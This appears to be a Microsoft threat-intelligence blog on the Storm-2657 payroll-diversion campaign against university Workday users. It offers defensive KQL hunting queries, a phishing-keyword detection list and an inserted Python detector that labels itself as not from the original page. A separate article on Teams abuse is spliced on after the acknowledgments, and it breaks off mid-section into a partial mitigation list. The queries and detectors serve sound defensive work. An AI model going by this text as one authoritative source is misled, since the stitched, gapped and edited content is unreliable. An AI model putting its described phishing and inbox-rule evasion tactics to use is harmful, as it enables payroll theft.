Microsoft Threat Intelligence has observed a financially motivated threat actor that we track as Storm-2657 compromising employee accounts to gain unauthorized access to employee profiles and divert salary payments to attacker-controlled accounts. These types of attacks have been dubbed “payroll pirate” by the industry. Storm-2657 is actively targeting a range of US-based organizations, particularly employees in sectors like higher education, to gain access to third-party human resources (HR) software as a service (SaaS) platforms like Workday.
In a campaign observed in the first half of 2025, we identified the actor specifically targeting Workday profiles. However, it’s important to note that any SaaS systems storing HR or payment and bank account information could be easily targeted with the same technique. These attacks don’t represent any vulnerability in the Workday platform or products, but rather financially motivated threat actors using sophisticated social engineering tactics and taking advantage of the complete lack of multifactor authentication (MFA) or lack of phishing-resistant MFA to compromise accounts. Workday has published guidance for their customers in their community, and we thank Workday for their partnership and support in helping to raise awareness on how to mitigate this threat.
Microsoft has identified and reached out to some of the affected customers to share tactics, techniques, and procedures (TTPs) and assist with mitigation efforts. In this blog, we present our analysis of Storm-2657’s recent campaign and the TTPs employed in attacks. We offer comprehensive guidance for investigation and remediation, including implementing phishing-resistant MFA to help block these attacks and protect user accounts. Additionally, we provide comprehensive detections and hunting queries to enable organizations to defend against this attack and disrupt threat actor activity.
Analysis of the campaign
In the observed campaign, the threat actor gained initial access through phishing emails crafted to steal MFA codes using adversary-in-the-middle (AiTM) phishing links. After obtaining MFA codes, the threat actor was able to gain unauthorized access to the victims’ Exchange Online mailboxes and later hijacked and modified their Workday profiles.
After gaining access to compromised employee accounts, the threat actor created inbox rules to delete incoming warning notification emails from Workday, hiding the actor’s changes to the HR profiles. Storm-2657 then stealthily moved on to modify the employee’s salary payment configuration in their HR profile, thereby redirecting future salary payments to accounts under the actor’s control, causing financial harm to their victims. While the following example illustrates the attack flow as observed in Workday environments, it’s important to note that similar techniques could be leveraged against any payroll provider or SaaS platform.
Figure 1. Attack flow of threat actor activity in a real incident
Initial access
The threat actor used realistic phishing emails, targeting accounts at multiple universities, to harvest credentials. Since March 2025, we’ve observed 11 successfully compromised accounts at three universities that were used to send phishing emails to nearly 6,000 email accounts across 25 universities.
Some phishing emails contained Google Docs links, making detection challenging, as these are common in academic environments. In multiple instances, compromised accounts did not have MFA enabled. In other cases, users were tricked into disclosing MFA codes via AiTM phishing links distributed through email. Following the compromise of email accounts and the payroll modifications in Workday, the threat actor leveraged newly accessed accounts to distribute further phishing emails, both within the organization and externally to other universities.
The threat actor used several themes in their phishing emails. One common theme involved messages about illnesses or outbreaks on campus, suggesting that recipients might have been exposed. These emails included a link to a Google Docs page that then redirected to an attacker-controlled domain.
Some examples of the email subject lines are:
COVID-Like Case Reported — Check Your Contact Status
Confirmed Case of Communicable Illness
Confirmed Illness
In one instance, a phishing email was sent to 500 individuals within a single organization, encouraging targets to check their illness exposure status. Approximately 10% of recipients reported the email as a suspected phishing attempt.
Figure 2. Sample of a phishing email sent by the threat actor with illness exposure related theme
The second theme involved reports of misconduct or actions by individuals within the faculty, with the goal of tricking recipients into checking the link to determine if they are mentioned in the report.
The most recently identified theme involved phishing emails impersonating a legitimate university or an entity associated with a university. To make their messages appear convincing, Storm-2657 tailored the content based on the recipient’s institution. Examples included messages that appear to be official communications from the university president, information about compensation and benefits, or documents shared by HR with recipients. Most of the time the subject line contained either the university name or the university’s president name, further enhancing the email’s legitimacy and appeal to the intended target.
Some examples of the subject lines are:
Please find the document forwarded by the HR Department for your review
[UNIVERSITY NAME] 2025 Compensation and Benefits Update
A document authored by [UNIVERSITY PRESIDENT NAME] has been shared for your examination.
Figure 3. Sample of a phishing email sent by the threat actor with HR related theme
Defense evasion
Following account compromise, the threat actor created a generic inbox rule to hide or delete any incoming warning notification emails from the organization’s Workday email service. This rule ensured that the victim would not see the notification emails from Workday about the payroll changes made by the threat actor, thereby minimizing the likelihood of detection by the victim. In some cases, the threat actor might have attempted to stay under the radar and hide their traces from potential reviews by giving rules names consisting solely of special characters or non-alphabetic symbols, such as “….” or “''''”.
Figure 4. An example of inbox rule creation to delete all incoming emails from Workday portal captured through Microsoft Defender for Cloud Apps
Persistence
In observed cases, the threat actor established persistence by enrolling their own phone numbers as MFA devices for victim accounts, either through Workday profiles or Duo MFA settings. By doing so, they bypassed the need for further MFA approval from the legitimate user, enabling continued access without detection.
Impact
The threat actor subsequently accessed Workday through single sign-on (SSO) and changed the victim’s payroll/bank account information.
With the Workday connector enabled in Microsoft Defender for Cloud Apps, analysts can investigate and identify attack traces by examining Workday logs alongside Defender-recorded actions. Several indicators help pinpoint these changes. For example, the Workday application audit logs record the actor’s modifications as an event named “Change My Account” or “Manage Payment Elections”, depending on the type of modification performed:
Figure 5. Example of payment modification audit log as captured through Microsoft Defender for Cloud Apps
These payroll modifications are frequently accompanied by notification emails informing users that payroll or bank details have been changed or updated. As previously discussed, threat actors might attempt to eliminate these messages either through manual deletion or by establishing inbox rules. These deletions can be identified by monitoring Exchange Online events such as SoftDelete, HardDelete, and MoveToDeletedItems. The subjects of these emails typically contain the following terms:
“Payment Elections”
“Payment Election”
“Direct Deposit”
Microsoft Defender for Cloud Apps correlates signals from both Microsoft Exchange Online (first-party SaaS application) and Workday (third-party SaaS application), enabling thorough detection of suspicious activities that span multiple systems, as seen in the image below. Only by correlating first-party and third-party signals is it possible to detect activity that spans multiple systems in this way.
Figure 6. Example of audit logs captured through Microsoft Defender for Cloud Apps showcasing an inbox rule creation in Microsoft Exchange Online followed by payroll account modification in Workday
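The inbox-rule-then-payroll-change chain described above, replayed in code as an added example (this is not code from the Microsoft page or from the Workday connector): a small Python detector that flattens the Exchange audit Parameters array of New-/Set-InboxRule events, flags rules that delete or file away mail from @myworkday.com, marks rule names made only of punctuation, and pairs each such rule with later Workday payment-election or device-enrolment events by the same account inside a time window. The row shape (Timestamp, Application, ActionType, AccountUpn, RawEventData), the sample accounts and the 24-hour window are assumptions, and the sample event rows are constructed.

```python
"""Added example, not code from the Microsoft page or the Workday connector.

Replays the Storm-2657 chain over constructed audit events shaped loosely like
Defender XDR CloudAppEvents rows. Field names, sample accounts and the
24-hour window are assumptions; the event rows below are constructed.
"""
import re
from datetime import datetime, timedelta

# Values taken from the page: the Workday notification sender domain, the
# Workday actions that change payment details, and the device-enrolment actions.
WORKDAY_SENDER_DOMAIN = "@myworkday.com"
PAYMENT_CHANGE_ACTIONS = {"Change My Account", "Manage Payment Elections"}
DEVICE_ADD_ACTIONS = {"Add iOS Device", "Add Android Device"}
INBOX_RULE_ACTIONS = {"New-InboxRule", "Set-InboxRule"}
DEFAULT_WINDOW = timedelta(hours=24)  # assumption: follow-up must land within a day


def rule_params(event):
    """Flatten the Exchange audit Parameters array ([{Name, Value}, ...]) into a dict."""
    return {p["Name"]: str(p["Value"]) for p in event["RawEventData"].get("Parameters", [])}


def hides_workday_mail(event):
    """True for inbox rules that delete or file away mail from the Workday sender."""
    if event["Application"] != "Microsoft Exchange Online":
        return False
    if event["ActionType"] not in INBOX_RULE_ACTIONS:
        return False
    params = rule_params(event)
    if WORKDAY_SENDER_DOMAIN not in params.get("From", "").lower():
        return False
    deletes = params.get("DeleteMessage", "").lower() == "true"
    files_away = bool(params.get("MoveToFolder"))
    return deletes or files_away


def is_obfuscated_name(name):
    """Rule names built only from punctuation ('....' or four apostrophes) have no letters or digits."""
    return bool(name) and re.fullmatch(r"[^\w]+", name) is not None


def is_workday_impact(event):
    """Workday events worth chaining: payment changes and MFA device enrolments."""
    return event["Application"] == "Workday" and (
        event["ActionType"] in PAYMENT_CHANGE_ACTIONS or event["ActionType"] in DEVICE_ADD_ACTIONS
    )


def correlate(events, window=DEFAULT_WINDOW):
    """Pair each Workday-hiding inbox rule with later Workday payment or device
    changes by the same account inside `window`. A rule with no follow-up is
    still reported at lower severity: the rule alone is the evasion step."""
    by_time = sorted(events, key=lambda e: e["Timestamp"])
    findings = []
    for rule in by_time:
        if not hides_workday_mail(rule):
            continue
        name = rule_params(rule).get("Name", "")
        account = rule["AccountUpn"].lower()
        followups = [
            e for e in by_time
            if is_workday_impact(e)
            and e["AccountUpn"].lower() == account
            and rule["Timestamp"] <= e["Timestamp"] <= rule["Timestamp"] + window
        ]
        findings.append({
            "account": rule["AccountUpn"],
            "rule_name": name,
            "obfuscated_name": is_obfuscated_name(name),
            "followup_actions": [e["ActionType"] for e in followups],
            "severity": "high" if followups else "medium",
        })
    return findings


def _ts(text):
    return datetime.fromisoformat(text)


# Constructed sample rows (not real telemetry).
SAMPLE_EVENTS = [
    # jdoe: Workday-hiding rule with a punctuation-only name, payment change 40 minutes later.
    {"Timestamp": _ts("2025-04-02T09:10:00"), "Application": "Microsoft Exchange Online",
     "ActionType": "New-InboxRule", "AccountUpn": "jdoe@university.example",
     "RawEventData": {"Parameters": [{"Name": "Name", "Value": "...."},
                                     {"Name": "From", "Value": "noreply@myworkday.com"},
                                     {"Name": "DeleteMessage", "Value": "True"}]}},
    {"Timestamp": _ts("2025-04-02T09:50:00"), "Application": "Workday",
     "ActionType": "Manage Payment Elections", "AccountUpn": "jdoe@university.example",
     "RawEventData": {"target": {"descriptor": "Payment Elections"}}},
    # asmith: benign rule filing a vendor newsletter; not Workday-related.
    {"Timestamp": _ts("2025-04-02T11:00:00"), "Application": "Microsoft Exchange Online",
     "ActionType": "New-InboxRule", "AccountUpn": "asmith@university.example",
     "RawEventData": {"Parameters": [{"Name": "Name", "Value": "Newsletters"},
                                     {"Name": "From", "Value": "news@vendor.example"},
                                     {"Name": "MoveToFolder", "Value": "Inbox\\Newsletters"}]}},
    # blee: Workday-hiding rule with a readable name; the device enrolment comes 3 days later.
    {"Timestamp": _ts("2025-04-03T08:00:00"), "Application": "Microsoft Exchange Online",
     "ActionType": "Set-InboxRule", "AccountUpn": "blee@university.example",
     "RawEventData": {"Parameters": [{"Name": "Name", "Value": "Workday"},
                                     {"Name": "From", "Value": "workday@myworkday.com"},
                                     {"Name": "MoveToFolder", "Value": "Deleted Items"}]}},
    {"Timestamp": _ts("2025-04-06T08:30:00"), "Application": "Workday",
     "ActionType": "Add Android Device", "AccountUpn": "blee@university.example",
     "RawEventData": {"target": {"descriptor": "Android device"}}},
]

if __name__ == "__main__":
    for finding in correlate(SAMPLE_EVENTS):
        print(finding)
```

Run against the sample rows, jdoe's rule is reported at high severity with the payment change as its follow-up, blee's rule is reported at medium severity with no follow-up inside 24 hours (widening the window to a week picks up the Android enrolment), and asmith's newsletter rule is ignored. The string match on "@myworkday.com" mirrors the `has "@myworkday.com"` filter in the hunting query; in production you would also match the tenant-specific Workday sender addresses your organization actually receives.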
Mitigation and protection guidance
Mitigating threats from actors like Storm-2657 begins with securing user identity by eliminating traditional credentials and adopting passwordless, phishing-resistant MFA methods such as FIDO2 security keys, Windows Hello for Business, and Microsoft Authenticator passkeys.
If Microsoft Defender alerts indicate suspicious activity or a confirmed compromised account or system, it’s essential to act quickly and thoroughly. Below are recommended remediation steps for each affected identity:
Reset credentials – Immediately reset the account’s password and revoke any active sessions or tokens. This ensures that any stolen credentials can no longer be used.
Re-register or remove MFA devices – Review each user’s registered MFA devices, specifically those recently added or updated, and remove any the user does not recognize.
Revert unauthorized payroll or financial changes – If the attacker modified payroll or financial configurations, such as direct deposit details, revert them to their original state and notify the appropriate internal teams.
Remove malicious inbox rules – Attackers often create inbox rules to hide their activity or forward sensitive data. Review and delete any suspicious or unauthorized rules.
Verify MFA reconfiguration – Confirm that the user has successfully reconfigured MFA and that the new setup uses secure, phishing-resistant methods.
Microsoft Defender XDR detections
Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Tactic: Initial access
Observed activity: Threat actor gains access to account through phishing
Microsoft Defender coverage:
Microsoft Defender for Office 365
– Email messages removed after delivery
– Email reported by user as malware or phish
Microsoft Defender XDR
– Compromised user account in a recognized attack pattern
– Anonymous IP address

Tactic: Defense evasion
Observed activity: Threat actor creates an inbox rule to delete incoming emails from Workday
Microsoft Defender coverage:
Microsoft Defender for Cloud Apps
– Possible BEC-related inbox rule
– Suspicious inbox manipulation rule
– Suspicious Workday inbox rule creation followed by a Workday session
– Malicious inbox rule manipulation possibly related to BEC payroll fraud attempt

Tactic: Impact
Observed activity: Threat actor gains access to victim’s Workday profile and modifies payroll elections
Microsoft Defender coverage:
Microsoft Defender for Cloud Apps
– Suspicious payroll configuration user activity in Workday
Hunting queries
Microsoft Defender XDR
The Microsoft Defender for Cloud Apps connector for Workday includes write events such as Workday account updates and payroll configuration changes. These are available in the Defender XDR CloudAppEvents hunting table for further investigation. Important events related to this attack include, but are not limited to, the following:
Review inbox rules created to hide or delete incoming emails from Workday
Results of the following query may indicate an attacker is trying to delete evidence of Workday activity.
CloudAppEvents
| where Timestamp >= ago(1d)
| where Application == "Microsoft Exchange Online" and ActionType in ("New-InboxRule", "Set-InboxRule")
| extend Parameters = RawEventData.Parameters // array of {Name, Value} inbox rule parameters
| where Parameters has "From" and Parameters has "@myworkday.com" // rule matches mail from the Workday notification sender
| where Parameters has "DeleteMessage" or Parameters has "MoveToFolder" // deletes or files away (hides) the matching mail
| mv-apply Parameter = Parameters on (
    summarize RuleFrom = take_anyif(tostring(Parameter.Value), tostring(Parameter.Name) == "From"),
              RuleName = take_anyif(tostring(Parameter.Value), tostring(Parameter.Name) == "Name")
) // one pass over the parameter array; a second mv-apply on the already-expanded column would return no rows
| project Timestamp, AccountDisplayName, AccountObjectId, IPAddress, ActionType, RuleName, RuleFrom
Review updates to payment election or bank account information in Workday
The following query surfaces changes to payment accounts in Workday.
CloudAppEvents
| where Timestamp >= ago(1d)
| where Application == "Workday"
| where ActionType == "Change My Account" or ActionType == "Manage Payment Elections"
| extend Descriptor = tostring(RawEventData.target.descriptor)
Review device additions in Workday
The following query looks for recent device additions in Workday. If the device is unknown, it may indicate an attacker joined their own device for persistence and MFA evasion.
CloudAppEvents
| where Timestamp >= ago(1d)
| where Application == "Workday"
| where ActionType has "Add iOS Device" or ActionType has "Add Android Device"
| extend Descriptor = tostring(RawEventData.target.descriptor) // will contain information of the device
Hunt for bulk suspicious emails from .edu sender
The following query identifies email from .edu senders sent to a high number of users.
EmailEvents
| where Timestamp >= ago(7d)
| where SenderFromDomain endswith ".edu" or SenderMailFromDomain endswith ".edu" // .edu top-level domain; `has "edu"` would also match unrelated domains containing that term
| where EmailDirection == "Inbound"
| summarize dcount(RecipientEmailAddress), dcount(InternetMessageId), make_set(InternetMessageId), dcount(Subject), dcount(NetworkMessageId), take_any(NetworkMessageId) by bin(Timestamp,1d), SenderFromAddress
| where dcount_RecipientEmailAddress > 100 // number can be adjusted, usually the sender will send emails to around 100-600 recipients per day
Hunt for phishing URL from identified .edu phish sender
If a suspicious .edu sender has been identified, use the following query to surface email events from this sender address.
EmailEvents
| where Timestamp >= ago(1d)
| where SenderFromAddress == "" // fill in the suspicious .edu sender address identified with the previous query
| where EmailDirection == "Inbound"
| project NetworkMessageId, Subject, InternetMessageId
| join (
    EmailUrlInfo
    | where Timestamp >= ago(1d)
) on NetworkMessageId
| project Url, NetworkMessageId, Subject, InternetMessageId
Hunt for user clicks to suspicious URL from the identified .edu phish sender (previous query)
If a suspicious .edu sender has been identified, use the below query to surface user clicks that may indicate a malicious link was accessed.
EmailEvents
| where Timestamp >= ago(1d)
| where SenderFromAddress == "" // fill in the suspicious .edu sender address identified earlier
| where EmailDirection == "Inbound"
| project NetworkMessageId, Subject, InternetMessageId
| join (
    UrlClickEvents
    | where Timestamp >= ago(1d)
) on NetworkMessageId
| project AccountUpn, Subject, InternetMessageId, Url, DetectionMethods, ThreatTypes, IsClickedThrough // these users very likely fell for the phishing attack
Microsoft Sentinel
Install the Workday connector for Microsoft Sentinel. Microsoft Sentinel has a range of detection and threat hunting content that customers can use to detect the post exploitation activity detailed in this blog.
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.
Malicious inbox rule
The query includes filters specific to inbox rule creation, operations for messages with ‘DeleteMessage’, and suspicious keywords.
let Keywords = dynamic(["helpdesk", " alert", " suspicious", "fake", "malicious", "phishing", "spam", "do not click", "do not open", "hijacked", "Fatal"]);
OfficeActivity
| where OfficeWorkload =~ "Exchange"
| where Operation =~ "New-InboxRule" and (ResultStatus =~ "True" or ResultStatus =~ "Succeeded")
| where Parameters has "Deleted Items" or Parameters has "Junk Email" or Parameters has "DeleteMessage"
| extend Events=todynamic(Parameters)
| parse Events with * "SubjectContainsWords" SubjectContainsWords '}'*
| parse Events with * "BodyContainsWords" BodyContainsWords '}'*
| parse Events with * "SubjectOrBodyContainsWords" SubjectOrBodyContainsWords '}'*
| where SubjectContainsWords has_any (Keywords)
or BodyContainsWords has_any (Keywords)
or SubjectOrBodyContainsWords has_any (Keywords)
| extend ClientIPAddress = case( ClientIP has ".", tostring(split(ClientIP,":")[0]), ClientIP has "[", tostring(trim_start(@'[[]',tostring(split(ClientIP,"]")[0]))), ClientIP )
| extend Keyword = iff(isnotempty(SubjectContainsWords), SubjectContainsWords, (iff(isnotempty(BodyContainsWords),BodyContainsWords,SubjectOrBodyContainsWords )))
| extend RuleDetail = case(OfficeObjectId contains '/' , tostring(split(OfficeObjectId, '/')[-1]) , tostring(split(OfficeObjectId, '\\')[-1]))
| summarize count(), StartTimeUtc = min(TimeGenerated), EndTimeUtc = max(TimeGenerated) by Operation, UserId, ClientIPAddress, ResultStatus, Keyword, OriginatingServer, OfficeObjectId, RuleDetail
| extend AccountName = tostring(split(UserId, "@")[0]), AccountUPNSuffix = tostring(split(UserId, "@")[1])
| extend OriginatingServerName = tostring(split(OriginatingServer, " ")[0])
Risky sign-in with new MFA method
This query identifies scenarios of risky sign-ins tied to new MFA methods being added.
let mfaMethodAdded = CloudAppEvents
| where ActionType =~ "Update user."
| where RawEventData has "StrongAuthenticationPhoneAppDetail" // Entra ID audit property that carries phone-app MFA registrations
| where isnotempty(RawEventData.ObjectId) and isnotempty(RawEventData.Target[1].ID)
| extend AccountUpn = tostring(RawEventData.ObjectId)
| extend AccountObjectId = tostring(RawEventData.Target[1].ID)
| project MfaAddedTimestamp = Timestamp, AccountUpn, AccountObjectId;
let usersWithNewMFAMethod = mfaMethodAdded
| distinct AccountObjectId;
let hasusersWithNewMFAMethod = isnotempty(toscalar(usersWithNewMFAMethod));
let riskySignins = AADSignInEventsBeta
| where hasusersWithNewMFAMethod
| where AccountObjectId in (usersWithNewMFAMethod)
| where RiskLevelDuringSignIn in ("50", "100") // medium and high sign-in risk level
| where Application in ("Office 365 Exchange Online", "OfficeHome")
| where isnotempty(SessionId)
| project SignInTimestamp = Timestamp, Application, SessionId, AccountObjectId, IPAddress, RiskLevelDuringSignIn
| summarize SignInTimestamp = arg_min(SignInTimestamp, *) by Application, SessionId, AccountObjectId, IPAddress, RiskLevelDuringSignIn;
mfaMethodAdded
| join riskySignins on AccountObjectId
| extend TimeFromSignInToMfaAdd = MfaAddedTimestamp - SignInTimestamp
| where TimeFromSignInToMfaAdd >= 0s // MFA method registered after the risky sign-in; add an upper bound on this delta that fits your environment
| project-away AccountObjectId1
Microsoft Security Copilot
Security Copilot customers can use the standalone experience to create their own prompts or run the following prebuilt promptbooks to automate incident response or investigation tasks related to this threat:
Incident investigation
Microsoft User analysis
Threat actor profile
Threat Intelligence 360 report based on MDTI article
Vulnerability impact assessment
Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.
Acknowledgments
We would like to thank Workday for their collaboration and assistance in responding to this threat.
The extensive collaboration features and global adoption of Microsoft Teams make it a high-value target for both cybercriminals and state-sponsored actors. Threat actors abuse its core capabilities – messaging (chat), calls and meetings, and video-based screen-sharing – at different points along the attack chain. This raises the stakes for defenders to proactively monitor, detect, and respond.
While under Microsoft’s Secure Future Initiative (SFI), default security has been strengthened by design, defenders still need to make the most out of customer-facing security capabilities. Therefore, this blog recommends countermeasures and controls across identity, endpoints, data apps, and network layers to help harden enterprise Teams environments. To frame these defenses, we first examine relevant stages of the attack chain. This guidance complements, but doesn’t repeat, the guidance built into the Microsoft Security Development Lifecycle (SDL) as outlined in the Teams Security Guide; we will instead focus on guidance for disrupting adversarial objectives based on the relatively recently observed attempts to exploit Teams infrastructure and capabilities.
Attack chain
Figure 1. Attack techniques that abuse Teams along the attack chain
Reconnaissance
Every Teams user account is backed by a Microsoft Entra ID identity. Each team member is an Entra ID object, and a team is a collection of channel objects. Teams may be configured for the cloud or a hybrid environment and supports multi-tenant organizations (MTO) and cross-tenant communication and collaboration. There are anonymous participants, guests, and external access users. From an API perspective, Teams is an object type that can be queried and stored in a local database for reconnaissance by enumerating directory objects, and mapping relationships and privileges. For example, federation tenant configuration indicates whether the tenant allows external communication and can be inferred from the API response queries reflecting the effective tenant federation policy.
While not unique to Teams, there are open-source frameworks that can specifically be leveraged to enumerate less secure users, groups, and tenants in Teams (mostly by repurposing the Microsoft Graph API or gathering DNS), including ROADtools, TeamFiltration, TeamsEnum, and MSFT-Recon-RS. These tools facilitate enumerating teams, members of teams and channels, tenant IDs and enabled domains, as well as permissiveness for communicating with external organizations and other properties, like presence. Presence indicates a user’s current availability and status outside the organization if Privacy mode is not enabled, which could then be exploited if the admin has not disabled external meetings and chat with people and organizations outside the organization (or at least limited it to specified external domains).
Many open-source tools are modular Python packages including reusable libraries and classes that can be directly imported or extended to support custom classes, meaning they are also interoperable with other custom open-source reconnaissance and discovery frameworks designed to identify potential misconfigurations.
Resource development
Microsoft continuously enhances protections against fraudulent Microsoft Entra ID Workforce tenants and the abuse of free tenants and trial subscriptions. As these defenses grow stronger, threat actors are forced to invest significantly more resources in their attempts to impersonate trusted users, demonstrating the effectiveness of our layered security approach. This includes threat actors trying to compromise weakly configured legitimate tenants, or even purchasing legitimate ones if they are confident they could ultimately profit. It should come as no surprise that if they can build a persona for social engineering, they will take advantage of the same resources as legitimate organizations, including custom domains and branding, especially if it lends credibility to impersonating an internal help desk, admin, or IT support, which could then be used as a convincing pretext to compromise targets through chat messaging and phone calls. Sophisticated threat actors try to use the very same resources used by trustworthy organizations, such as acquiring multiple tenants for staging development or running separate operations across regions, and using everyday Teams features like scheduling private meetings through chat, and audio, video and screen-sharing capabilities for productivity.
Initial access
Tech support scams remain a generally popular pretext for delivery of malicious remote monitoring and management (RMM) tools and information-stealing malware, leading to credential theft, extortion, and ransomware. There are always new variants to bypass security awareness defenses, such as the rise in email bombing to create a sense of stress and urgency to restore normalcy. In 2024, for instance, Storm-1811 impersonated tech support, claiming to be addressing junk email issues that it had itself initiated. They used RMM tools to deliver the ReedBed malware loader, which in turn delivered ransomware payloads and enabled remote command execution. Meanwhile, Midnight Blizzard has successfully impersonated security and technical support teams to get targets to “verify their identities”, under the pretext of protecting their accounts, by entering authentication codes that in fact complete the authentication flow the actor uses to break into the accounts.
Similarly in May, Sophos identified a 3AM ransomware (believed to be a rebranding of BlackSuit) affiliate adopting techniques from Storm-1811, including flooding employees with unwanted emails followed by voice and video calls on Teams impersonating help desk personnel, claiming they needed remote access to stop the flood of junk emails. The threat actor reportedly spoofed the IT organization’s phone number.
With threat actors leveraging deepfakes, perceived authority helps make this kind of social engineering even more effective. Threat actors seeking to spoof automated workflow notifications and interactions can naturally extend to spoofing legitimate bots and agents as they gain more traction, as threat actors are turning to language models to facilitate their objectives.
Prevalent threat actors associated with ransomware campaigns, including the access broker tracked as Storm-1674, have used sophisticated red teaming tools, like TeamsPhisher, to distribute DarkGate malware and other malicious payloads over Teams. In December 2024, for example, Trend Micro reported an incident in which a threat actor impersonated a client during a Teams call to persuade a target to install AnyDesk. That remote access was then reportedly used to deploy DarkGate. Threat actors may also simply use Teams to gain initial access through drive-by compromise, directing users to malicious websites.
Widely available admin tools, including AADInternals, could be leveraged to deliver malicious links and payloads directly into Teams. Teams branding (like any communications brand asset) makes for effective bait, and has been used by adversary-in-the-middle (AiTM) actors like Storm-00485. Threat actors could place malicious advertisements in search results for a spoofed app like Teams to misdirect users to a download site hosting credential-stealing malware. In July 2025, for instance, Malwarebytes reported observing a malvertising campaign delivering credential-stealing malware through a fake Microsoft Teams for Mac installer.
Whether it is a core app that is part of Teams, an app created by Microsoft, a partner app validated by Microsoft, or a custom app created by your own organization—no matter how secure an app—they could still be spoofed to gain a foothold in a network. And similar to leveraging a trusted brand like Teams, threat actors will also continue to try and take advantage of trusted relationships as well to gain Teams access, whether leveraging an account with access or abusing delegated administrator relationships to reach a target environment.
Persistence
Threat actors employ a variety of persistence techniques to maintain access to target systems—even after defenders attempt to regain control. These methods include abusing shortcuts in the Startup folder to execute malicious tools, or exploiting accessibility features like Sticky Keys (as seen in this ransomware case study). Threat actors could try to create guest users in target tenants or add their own credentials to a Teams account to maintain access.
Part of the reason device code phishing has been used to access target accounts is that it could enable persistent access for as long as the tokens remain valid. In February, Microsoft reported that Storm-2372 had been capturing authentication tokens by exploiting device code authentication flows, partially by masquerading as Microsoft Teams meeting invitations and initiating Teams chats to build rapport, so that when the targets were prompted to authenticate, they would use Storm-2372-generated device codes, enabling Storm-2372 to steal the authenticated sessions from the valid access tokens.
Teams phishing lures themselves can sometimes be a disguised attempt to help threat actors maintain persistence. For example, in July 2025, the financially motivated Storm-0324 most likely relied on TeamsPhisher to send Teams phishing lures to deliver a custom malware JSSloader for the ransomware operator Sangria Tempest to use as an access vector to maintain a foothold.
Execution
Apart from admin accounts, which are an attractive target because they come with elevated privileges, threat actors try and trick everyday Teams users into clicking links or opening files that lead to malicious code execution, just like through email.
Privilege escalation
If threat actors successfully compromise accounts or register actor-controlled devices, they often try to change permission groups to escalate privileges. If a threat actor successfully compromises a Teams admin role, this could lead to abuse of the permissions to use the admin tools that belong to that role.
Credential access
With a valid refresh token, actors can impersonate users through Teams APIs. There is no shortage of administrator tools that can be maliciously repurposed, such as AADInternals, to intercept access to tokens with custom phishing flows. Tools like TeamFiltration could be leveraged just like for any other Microsoft 365 service for targeting Teams. If credentials are compromised through password spraying, threat actors use tools like this to request OAuth tokens for Teams and other services. Threat actors continue to try and bypass multifactor authentication (MFA) by repeatedly generating authentication prompts until someone accepts by mistake, and try to compromise MFA by adding alternate phone numbers or intercepting SMS-based codes.
For instance, the financially motivated threat actor Octo Tempest uses aggressive social engineering, including over Teams, to take control of MFA for privileged accounts. They consistently socially engineer help desk personnel, targeting federated identity providers using tools like AADInternals to federate existing domains, or spoof legitimate domains by adding and then federating new domains to forge tokens.
Discovery
To refine targeting, threat actors analyze Teams configuration data from API responses, enumerate Teams apps if they obtain unauthorized access, and search for valuable files and directories by leveraging toolkits for contextualizing potential attack paths. For instance, Void Blizzard has used AzureHound to enumerate a compromised organization’s Microsoft Entra ID configuration and gather details on users, roles, groups, applications, and devices. In a small number of compromises, the threat actor accessed Teams conversations and messages through the web client. AADInternals can also be used to discover Teams group structures and permissions.
The state-sponsored actor Peach Sandstorm has delivered malicious ZIP files through Teams, then used AD Explorer to take snapshots of on-premises Active Directory database and related files.
Lateral movement
A threat actor that manages to obtain Teams admin access (whether directly or indirectly by purchasing an admin account through a rogue online marketplace) could potentially leverage external communication settings and enable trust relationships between organizations to move laterally. In late 2024, in a campaign dubbed VEILdrive by Hunters’ Team AXON, the financially motivated cybercriminal threat actors Sangria Tempest and Storm-1674 used previously compromised accounts to impersonate IT personnel and convince a user in another organization through Teams to accept a chat request and grant access through a remote connection.
Collection
Threat actors often target Teams to try and collect information from it that could help them to accomplish their objectives, such as to discover collaboration channels or high-privileged accounts. They could try to mine Teams for any information perceived as useful in furtherance of their objectives, including pivoting from a compromised account to data accessible to that user from OneDrive or SharePoint. AADInternals can be used to collect sensitive chat data and user profiles. Post-compromise, GraphRunner can leverage the Microsoft Graph API to search all chats and channels and export Teams conversations.
Command and control
Threat actors attempt to deliver malware through file attachments in Teams chats or channels. A cracked version of Brute Ratel C4 (BRc4) includes features to establish C2 channels with platforms like Microsoft Teams by using their communications protocols to send and receive commands and data.
Post-compromise, threat actors can use red teaming tool ConvoC2 to send commands through Microsoft Teams messages using the Adaptive Card framework to embed data in hidden span tags and then exfiltrate using webhooks. But threat actors can also use legitimate remote access tools to try and establish interactive C2 through Teams.
Exfiltration
Threat actors may use Teams messages or shared links to direct data exfiltration to cloud storage under their control. Tools like TeamFiltration include an exfiltration module that relies on a valid access token to extract recent contacts and download chats and files through OneDrive or SharePoint.
Impact
Threat actors try to use Teams messages to support financial theft through extortion, social engineering, or technical means.
Octo Tempest has used communication apps, including Teams, to send taunting and threatening messages to organizations, defenders, and incident response teams as part of extortion and ransomware payment pressure tactics. After gaining control of MFA through socially engineered password resets, they sign in to Teams to identify sensitive information supporting their financially motivated operations.
Configure just-in-time access to privileged roles. Use Microsoft Entra Privileged Identity Management (PIM) (preview) to provide as-needed and just-in-time access to Microsoft 365 roles to reduce standing privileges and limit exposure.
Harden endpoint security
Use configuration analyzer to strengthen security posture. Identify and remediate security policies that are less secure than the Standard or Strict protection profiles in preset security policies.
Keep Teams clients, browsers, OS, and dependencies updated.
Enable cloud-delivered protection in Defender Antivirus. Cloud-delivered protection enables sharing detection status between Microsoft 365 and Defender for Endpoint. Real-time protection blocking, including on-access scanning, is not available when Defender Antivirus is running only in passive mode. You can turn on endpoint detection and response (EDR) in block mode even if Defender Antivirus isn’t your primary antivirus solution. EDR in block mode detects and remediates malicious items on the device post-breach.
Protect security settings from being disabled or changed with tamper protection.
If your organization utilizes another remote support tool such as Remote Help, disable or remove Quick Assist as a best practice, if it isn’t used within your environment.
